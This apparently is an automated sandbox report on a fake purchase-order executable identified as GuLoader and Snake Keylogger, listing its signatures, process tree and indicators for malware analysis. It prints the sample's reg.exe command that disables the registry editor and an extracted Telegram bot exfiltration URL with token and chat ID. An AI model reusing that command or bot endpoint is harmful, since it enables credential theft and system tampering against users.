Windows
Analysis Report
z65PurchaseOrderNo_0072024_pdf.exe
Overview
General Information
Detection
GuLoader, Snake Keylogger
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Disables the Windows registry editor (regedit)
Initial sample is a PE file and has a suspicious name
Mass process execution to delay analysis
Obfuscated command line found
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Too many similar processes found
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses reg.exe to modify the Windows registry
Yara detected Credential Stealer
Classification
- System is w10x64native
z65PurchaseOrderNo_0072024_pdf.exe (PID: 5656 cmdline:
"C:\Users\ user\Deskt op\z65Purc haseOrderN o_0072024_ pdf.exe" MD5: 89C28F1673D7CBFBFB25B4758F1B388F) cmd.exe (PID: 4284 cmdline:
cmd.exe /c set /a "2 50^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 3080 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 6780 cmdline:
cmd.exe /c set /a "2 44^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 2672 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 7512 cmdline:
cmd.exe /c set /a "2 27^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 8008 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 4076 cmdline:
cmd.exe /c set /a "2 55^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 2308 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 5728 cmdline:
cmd.exe /c set /a "2 44^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 1672 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 916 cmdline:
cmd.exe /c set /a "2 53^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 7384 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 4412 cmdline:
cmd.exe /c set /a "1 30^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 7236 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 6392 cmdline:
cmd.exe /c set /a "1 31^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 6672 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 5756 cmdline:
cmd.exe /c set /a "1 39^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 6192 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 3592 cmdline:
cmd.exe /c set /a "1 39^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 8108 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 1152 cmdline:
cmd.exe /c set /a "2 42^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 4152 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 3356 cmdline:
cmd.exe /c set /a "1 95^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 1220 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 7068 cmdline:
cmd.exe /c set /a "2 12^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 4184 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 4296 cmdline:
cmd.exe /c set /a "2 08^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 4356 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 6096 cmdline:
cmd.exe /c set /a "1 97^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 4280 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 7180 cmdline:
cmd.exe /c set /a "2 12^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 7612 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 7676 cmdline:
cmd.exe /c set /a "2 47^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 940 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 1208 cmdline:
cmd.exe /c set /a "2 16^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 3672 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 7480 cmdline:
cmd.exe /c set /a "2 21^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 7532 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 3960 cmdline:
cmd.exe /c set /a "2 12^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 1620 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 5476 cmdline:
cmd.exe /c set /a "2 40^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 2908 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 4832 cmdline:
cmd.exe /c set /a "1 53^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 6780 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 6120 cmdline:
cmd.exe /c set /a "2 20^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 968 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 6084 cmdline:
cmd.exe /c set /a "1 45^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 6088 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 5728 cmdline:
cmd.exe /c set /a "1 95^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 1728 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 7736 cmdline:
cmd.exe /c set /a "1 33^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 7176 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 6392 cmdline:
cmd.exe /c set /a "1 45^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 2904 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 5756 cmdline:
cmd.exe /c set /a "1 57^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 5812 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 3592 cmdline:
cmd.exe /c set /a "1 45^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 7976 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 2672 cmdline:
cmd.exe /c set /a "2 16^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 6520 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 7564 cmdline:
cmd.exe /c set /a "1 45^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 5808 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 1672 cmdline:
cmd.exe /c set /a "1 29^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 4356 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 448 cmdline:
cmd.exe /c set /a "2 01^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 1728 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 1616 cmdline:
cmd.exe /c set /a "1 37^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 452 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 2904 cmdline:
cmd.exe /c set /a "1 29^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 6392 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 5812 cmdline:
cmd.exe /c set /a "1 29^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 5756 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 7976 cmdline:
cmd.exe /c set /a "1 29^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 3592 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 6520 cmdline:
cmd.exe /c set /a "1 29^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 2672 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 2308 cmdline:
cmd.exe /c set /a "1 29^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 1112 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 1776 cmdline:
cmd.exe /c set /a "1 29^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 6096 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 4412 cmdline:
cmd.exe /c set /a "1 29^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 7536 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 3672 cmdline:
cmd.exe /c set /a "1 57^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 1208 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 2736 cmdline:
cmd.exe /c set /a "1 45^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 1016 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 3960 cmdline:
cmd.exe /c set /a "2 16^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 3080 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 1084 cmdline:
cmd.exe /c set /a "1 45^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 5476 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 4832 cmdline:
cmd.exe /c set /a "1 29^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 6244 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 968 cmdline:
cmd.exe /c set /a "1 57^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 5808 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 5196 cmdline:
cmd.exe /c set /a "1 45^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 4296 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 2404 cmdline:
cmd.exe /c set /a "1 93^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 1036 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 4136 cmdline:
cmd.exe /c set /a "1 45^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 4272 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 8100 cmdline:
cmd.exe /c set /a "1 29^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 5600 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 5400 cmdline:
cmd.exe /c set /a "1 57^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 7248 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 1220 cmdline:
cmd.exe /c set /a "1 45^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 7912 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 4184 cmdline:
cmd.exe /c set /a "2 16^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 7068 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 6980 cmdline:
cmd.exe /c set /a "1 45^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 1892 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 5248 cmdline:
cmd.exe /c set /a "1 33^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 1672 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 1728 cmdline:
cmd.exe /c set /a "1 57^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 448 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 1616 cmdline:
cmd.exe /c set /a "1 45^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 7176 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 1536 cmdline:
cmd.exe /c set /a "2 16^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 2904 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 4076 cmdline:
cmd.exe /c set /a "1 45^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 4152 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 7920 cmdline:
cmd.exe /c set /a "1 29^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 6484 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 7544 cmdline:
cmd.exe /c set /a "2 01^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 7512 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 2308 cmdline:
cmd.exe /c set /a "1 37^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 4888 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) cmd.exe (PID: 1776 cmdline:
cmd.exe /c set /a "1 29^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) Conhost.exe (PID: 696 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68) z65PurchaseOrderNo_0072024_pdf.exe (PID: 1652 cmdline:
"C:\Users\ user\Deskt op\z65Purc haseOrderN o_0072024_ pdf.exe" MD5: 89C28F1673D7CBFBFB25B4758F1B388F) reg.exe (PID: 7228 cmdline:
REG add HK CU\Softwar e\Microsof t\Windows\ CurrentVer sion\Polic ies\System /v Disabl eRegistryT ools /t RE G_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C) conhost.exe (PID: 7028 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
404 Keylogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution |
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7169426142:AAG_Nuf4vFdD3YALIW-rE-UaNUDVey15SPM/sendMessage?chat_id=1545867115"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_GuLoader_3 | Yara detected GuLoader | Joe Security | ||
JoeSecurity_GuLoader_3 | Yara detected GuLoader | Joe Security | ||
JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security | ||
JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security | ||
JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | ||
Click to see the 3 entries |
⊘No Sigma rule has matched
⊘No Snort rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira: |
Source: | Malware Configuration Extractor: |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Location Tracking |
---|
Source: | DNS query: |
Source: | Code function: | 130_2_3841DCD8 | |
Source: | Code function: | 130_2_3841DCD0 |
Source: | Static PE information: |
Source: | HTTPS traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Code function: | 0_2_00406167 | |
Source: | Code function: | 0_2_00405705 | |
Source: | Code function: | 0_2_00402688 | |
Source: | Code function: | 130_2_00406167 | |
Source: | Code function: | 130_2_00405705 | |
Source: | Code function: | 130_2_00402688 |
Source: | Code function: | 130_2_0011F928 | |
Source: | Code function: | 130_2_384129C8 | |
Source: | Code function: | 130_2_38412E28 | |
Source: | Code function: | 130_2_38410B30 | |
Source: | Code function: | 130_2_38410B30 | |
Source: | Code function: | 130_2_38410040 | |
Source: | Code function: | 130_2_38411848 | |
Source: | Code function: | 130_2_38411CA8 | |
Source: | Code function: | 130_2_38412568 | |
Source: | Code function: | 130_2_3841316E | |
Source: | Code function: | 130_2_38412108 | |
Source: | Code function: | 130_2_3841F530 | |
Source: | Code function: | 130_2_3841F7C8 | |
Source: | Code function: | 130_2_3847C718 | |
Source: | Code function: | 130_2_38470040 | |
Source: | Code function: | 130_2_38471A50 | |
Source: | Code function: | 130_2_38473460 | |
Source: | Code function: | 130_2_3847BE68 | |
Source: | Code function: | 130_2_38474E70 | |
Source: | Code function: | 130_2_38473008 | |
Source: | Code function: | 130_2_3847BA10 | |
Source: | Code function: | 130_2_38474A18 | |
Source: | Code function: | 130_2_3847A430 | |
Source: | Code function: | 130_2_3847C2C0 | |
Source: | Code function: | 130_2_384774C8 | |
Source: | Code function: | 130_2_3847ACE0 | |
Source: | Code function: | 130_2_384708F0 | |
Source: | Code function: | 130_2_3847A888 | |
Source: | Code function: | 130_2_38470498 | |
Source: | Code function: | 130_2_38471EA8 | |
Source: | Code function: | 130_2_384792A8 | |
Source: | Code function: | 130_2_384774B7 | |
Source: | Code function: | 130_2_384738B8 | |
Source: | Code function: | 130_2_38470D48 | |
Source: | Code function: | 130_2_38472758 | |
Source: | Code function: | 130_2_3847B160 | |
Source: | Code function: | 130_2_38474168 | |
Source: | Code function: | 130_2_38472300 | |
Source: | Code function: | 130_2_38473D10 | |
Source: | Code function: | 130_2_38479728 | |
Source: | Code function: | 130_2_384745C0 | |
Source: | Code function: | 130_2_38479FD8 | |
Source: | Code function: | 130_2_384715F8 | |
Source: | Code function: | 130_2_38479B80 | |
Source: | Code function: | 130_2_384711A0 | |
Source: | Code function: | 130_2_38472BB0 | |
Source: | Code function: | 130_2_3847B5B8 |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: |
Source: | JA3 fingerprint: | ||
Source: | JA3 fingerprint: |
Source: | DNS query: | ||
Source: | DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | HTTPS traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |